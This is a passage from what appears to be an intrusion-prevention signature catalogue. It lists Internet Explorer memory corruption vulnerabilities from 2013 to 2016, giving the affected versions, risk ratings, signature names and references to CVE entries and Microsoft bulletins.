https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3139

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-555-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048

References:

CVE-2013-5048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5048

MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-555-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to errors while handling certain objects when processing HTML and script code. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049-2

References:

CVE-2013-5049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5049

BID-64123
http://www.securityfocus.com/bid/64123

OSVDB-100754
http://www.osvdb.org/100754

MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-555-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051

References:

CVE-2013-5051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5051

MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-555-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0

Type:

Input Validation

Description:

A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to errors while handling certain objects when processing HTML and script code. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052

References:

CVE-2013-5052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5052

BID-64124
http://www.securityfocus.com/bid/64124

OSVDB-100756
http://www.osvdb.org/100756

MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762

References:

CVE-2014-1762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1762

BID-67511
http://www.securityfocus.com/bid/67511

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766

References:

CVE-2014-1766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1766

BID-67518
http://www.securityfocus.com/bid/67518

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785

References:

CVE-2014-1785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1785

BID-67878
http://www.securityfocus.com/bid/67878

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows RT; Windows 2008 R2; Windows 2012

Software:

Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789

References:

CVE-2014-1789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1789

BID-67881
http://www.securityfocus.com/bid/67881

OSVDB-107866
http://www.osvdb.org/107866

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791

References:

CVE-2014-1791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1791

BID-67884
http://www.securityfocus.com/bid/67884

OSVDB-107868
http://www.osvdb.org/107868

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795

References:

CVE-2014-1795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1795

BID-67887
http://www.securityfocus.com/bid/67887

OSVDB-107871
http://www.osvdb.org/107871

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 11.0; Internet Explorer 8.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800

References:

CVE-2014-1800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1800

BID-67831
http://www.securityfocus.com/bid/67831

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802

References:

CVE-2014-1802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1802

BID-67833
http://www.securityfocus.com/bid/67833

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804

References:

CVE-2014-1804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1804

BID-67835
http://www.securityfocus.com/bid/67835

OSVDB-107878
http://www.osvdb.org/107878

MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows XP SP2; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820

References:

CVE-2014-2820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2820

OSVDB-109951
http://www.osvdb.org/109951

MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 8; Windows 8.1; Windows 7; Windows 2008 R2; Windows 2012 R2

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823

References:

CVE-2014-2823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2823

MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP2; Windows 2003; Windows 2008; Windows 2008 R2; Windows 7

Software:

Internet Explorer 8.0

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824

References:

CVE-2014-2824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2824

MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050

References:

CVE-2014-4050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4050

OSVDB-109959
http://www.osvdb.org/109959

MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-611-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126

References:

CVE-2014-4126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4126

BID-70328
http://www.securityfocus.com/bid/70328

MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-611-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127

References:

CVE-2014-4127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4127

BID-70329
http://www.securityfocus.com/bid/70329

MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-611-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130

References:

CVE-2014-4130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4130

BID-70332
http://www.securityfocus.com/bid/70332

MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-611-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140

References:

CVE-2014-4140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4140

BID-70325
http://www.securityfocus.com/bid/70325

MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967

References:

CVE-2014-8967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8967

BID-71483
http://www.securityfocus.com/bid/71483

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018

References:

CVE-2015-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0018

BID-72403
http://www.securityfocus.com/bid/72403

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Input Validation

Description:

An integer overflow vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an improper boundary check on the direction attribute value of a shadow filter. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036

References:

CVE-2015-0036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0036

BID-72446
http://www.securityfocus.com/bid/72446

OSVDB-118156
http://www.osvdb.org/118156

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to a type confusion flaw while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046

References:

CVE-2015-0046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0046

BID-72416
http://www.securityfocus.com/bid/72416

OSVDB-118166
http://www.osvdb.org/118166

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634

References:

CVE-2015-1634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1634

BID-72931
http://www.securityfocus.com/bid/72931

MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401

References:

CVE-2015-2401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2401

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404

References:

CVE-2015-2404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2404

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406

References:

CVE-2015-2406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2406

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408

References:

CVE-2015-2408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2408

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422

References:

CVE-2015-2422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2422

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling MutationObserver objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425

References:

CVE-2015-2425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2425

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-679-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492

References:

CVE-2015-2492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2492

MS15-094
http://technet.microsoft.com/security/bulletin/MS15-094

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083

References:

CVE-2015-6083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6083

BID-78481
http://www.securityfocus.com/bid/78481

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6088

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-6088

References:

CVE-2015-6088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6088

MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160

References:

CVE-2015-6160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6160

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-741-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer 11.0. A remote attacker could use this to execute arbitrary code on the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108

References:

CVE-2016-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0108

MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080

References:

CVE-2014-4080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4080

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081

References:

CVE-2014-4081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4081

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2003; Windows XP; Windows XP SP2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086

References:

CVE-2014-4086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4086

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

